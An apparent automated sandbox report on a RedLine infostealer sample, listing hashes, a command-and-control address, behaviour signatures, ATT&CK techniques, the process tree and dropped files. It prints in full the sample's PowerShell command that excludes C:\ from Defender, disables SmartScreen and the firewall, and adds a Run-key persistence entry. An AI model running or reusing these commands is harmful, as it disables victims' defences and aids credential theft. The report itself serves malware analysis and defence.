redline | d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92

Analysis

max time kernel
44s
max time network
105s
platform
windows7_x64
resource
win7-20220414-en
submitted
07-07-2022 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

47645.exe
Size

1.8MB
MD5

30b6d624d18490acfe42a1944c6d3172
SHA1

35402770ba44139f50b5613c274a6b4607be3b16
SHA256

d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
SHA512

42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c

Score

10^/10

redline 1327052997 evasion infostealer spyware suricata

Malware Config

Extracted

Family

redline

Botnet

1327052997

37.235.54.26:8362

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/213420-65-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/213420-70-0x000000000041972E-mapping.dmp	family_redline
behavioral1/memory/213420-71-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/213420-72-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

doc.exeDllHost.exe

pid process

1448 doc.exe
1364 DllHost.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

213700 netsh.exe
Drops startup file 1 IoCs

Processes:

DllHost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk DllHost.exe
Loads dropped DLL 9 IoCs

Processes:

47645.exeDllHost.exeWerFault.exe

pid process

536 47645.exe
536 47645.exe
536 47645.exe
1268
1364 DllHost.exe
213620 WerFault.exe
213620 WerFault.exe
213620 WerFault.exe
213620 WerFault.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 api.ipify.org
10 api.ipify.org
11 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

doc.exe

description pid process target process

PID 1448 set thread context of 213420 1448 doc.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

213620 1364 WerFault.exe DllHost.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

DllHost.exepowershell.exeAppLaunch.exe

pid process

1364 DllHost.exe
1364 DllHost.exe
213568 powershell.exe
213420 AppLaunch.exe
213420 AppLaunch.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

AppLaunch.exepowershell.exe

description pid process

Token: SeDebugPrivilege 213420 AppLaunch.exe
Token: SeDebugPrivilege 213568 powershell.exe

pid	process
1448	doc.exe
1364	DllHost.exe

pid	process
213700	netsh.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	DllHost.exe

pid	process
536	47645.exe
536	47645.exe
536	47645.exe
1268
1364	DllHost.exe
213620	WerFault.exe
213620	WerFault.exe
213620	WerFault.exe
213620	WerFault.exe

flow	ioc
8	api.ipify.org
10	api.ipify.org
11	api.ipify.org

description	pid	process	target process
PID 1448 set thread context of 213420	1448	doc.exe	AppLaunch.exe

pid	pid_target	process	target process
213620	1364	WerFault.exe	DllHost.exe

pid	process
1364	DllHost.exe
1364	DllHost.exe
213568	powershell.exe
213420	AppLaunch.exe
213420	AppLaunch.exe

description	pid	process
Token: SeDebugPrivilege	213420	AppLaunch.exe
Token: SeDebugPrivilege	213568	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

47645.exedoc.exeDllHost.exepowershell.exe

description	pid	process	target process
PID 536 wrote to memory of 1448	536	47645.exe	doc.exe
PID 536 wrote to memory of 1448	536	47645.exe	doc.exe
PID 536 wrote to memory of 1448	536	47645.exe	doc.exe
PID 536 wrote to memory of 1448	536	47645.exe	doc.exe
PID 536 wrote to memory of 1364	536	47645.exe	DllHost.exe
PID 536 wrote to memory of 1364	536	47645.exe	DllHost.exe
PID 536 wrote to memory of 1364	536	47645.exe	DllHost.exe
PID 536 wrote to memory of 1364	536	47645.exe	DllHost.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1448 wrote to memory of 213420	1448	doc.exe	AppLaunch.exe
PID 1364 wrote to memory of 213568	1364	DllHost.exe	powershell.exe
PID 1364 wrote to memory of 213568	1364	DllHost.exe	powershell.exe
PID 1364 wrote to memory of 213568	1364	DllHost.exe	powershell.exe
PID 1364 wrote to memory of 213620	1364	DllHost.exe	WerFault.exe
PID 1364 wrote to memory of 213620	1364	DllHost.exe	WerFault.exe
PID 1364 wrote to memory of 213620	1364	DllHost.exe	WerFault.exe
PID 213568 wrote to memory of 213700	213568	powershell.exe	netsh.exe
PID 213568 wrote to memory of 213700	213568	powershell.exe	netsh.exe
PID 213568 wrote to memory of 213700	213568	powershell.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\47645.exe
"C:\Users\Admin\AppData\Local\Temp\47645.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:536

C:\Users\Admin\AppData\Local\Temp\doc.exe
"C:\Users\Admin\AppData\Local\Temp\doc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:213420

C:\Users\Admin\AppData\Local\Temp\DllHost.exe
"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System вЂ“Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run вЂ“Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:213568

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:213700

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1364 -s 1516
3⤵
- Loads dropped DLL
- Program crash
PID:213620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
\ProgramData\MicrosoftNetwork\System.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe
Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
\Users\Admin\AppData\Local\Temp\doc.exe
Filesize
2.4MB

MD5
401cdd939e412e97c9eab5766be869d9

SHA1
e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0

SHA256
7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573

SHA512
266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b

Download Submit
memory/1364-62-0x000007FEFB721000-0x000007FEFB723000-memory.dmp

Filesize
8KB

Download
memory/1364-59-0x0000000000000000-mapping.dmp

Download
memory/1448-56-0x0000000000000000-mapping.dmp

Download
memory/213420-70-0x000000000041972E-mapping.dmp

Download
memory/213420-73-0x0000000075B61000-0x0000000075B63000-memory.dmp

Filesize
8KB

Download
memory/213420-72-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213420-65-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213420-71-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213420-63-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/213568-84-0x0000000002454000-0x0000000002457000-memory.dmp

Filesize
12KB

Download
memory/213568-79-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/213568-74-0x0000000000000000-mapping.dmp

Download
memory/213568-85-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/213568-86-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/213568-89-0x0000000002454000-0x0000000002457000-memory.dmp

Filesize
12KB

Download
memory/213568-90-0x000000000245B000-0x000000000247A000-memory.dmp

Filesize
124KB

Download
memory/213620-78-0x0000000000000000-mapping.dmp

Download
memory/213700-87-0x0000000000000000-mapping.dmp

Download